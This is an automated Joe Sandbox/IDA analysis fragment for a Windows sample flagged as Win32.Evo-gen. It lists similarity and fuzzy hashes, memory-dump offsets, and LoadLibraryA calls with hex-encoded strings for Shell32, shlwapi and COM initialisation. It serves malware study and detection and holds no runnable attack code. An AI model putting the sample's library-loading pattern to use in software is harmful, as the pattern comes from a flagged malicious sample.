                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 367037083-210220030
                  • Opcode ID: edf4c10db06244e39ff5c017d27920f634205165b951dec17d65069747d2f163
                  • Instruction ID: 53046993fa7bca8af692352fd939652f4fea8d022a41d3f8cff851325e442ec0
                  • Opcode Fuzzy Hash: edf4c10db06244e39ff5c017d27920f634205165b951dec17d65069747d2f163
                  • Instruction Fuzzy Hash: 8C012C79381B957FD620F7F09D0BE8E79906B1DB03F44080476B6A9147DBE4A02146A2

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(?,33656C4F,00000032,00004E20), ref: 03124124
                  • LoadLibraryA.KERNEL32(?,6C656853,2E32336C,006C6C64,?,72436F43,65746165,74736E49,65636E61,00000000,?,6E496F43,61697469,657A696C,00000000,33656C4F), ref: 031241C2
                    • Part of subcall function 03121131: LoadLibraryA.KERNEL32(NTDLL,?), ref: 031211F9
                  • LoadLibraryA.KERNEL32(?,776C6873,2E697061,006C6C64,?,6C656853,2E32336C,006C6C64,?,72436F43,65746165,74736E49,65636E61,00000000,?,6E496F43), ref: 03124243
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03124220
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 1029625771-210220030
                  • Opcode ID: c02a03c45145dd33c08bc10dff3c6d4b1008fda1d8ac48d2229995f3b9ea7875
                  • Instruction ID: a7b414776f3782303df141edb178a67aeec5dc455c5adeeb383e1334dfdb4c66
                  • Opcode Fuzzy Hash: c02a03c45145dd33c08bc10dff3c6d4b1008fda1d8ac48d2229995f3b9ea7875
                  • Instruction Fuzzy Hash: 0241B038288301BFEA05FB75EC85F1E3F21BB0CB12F10C120F984A9599DFB1D5A08A65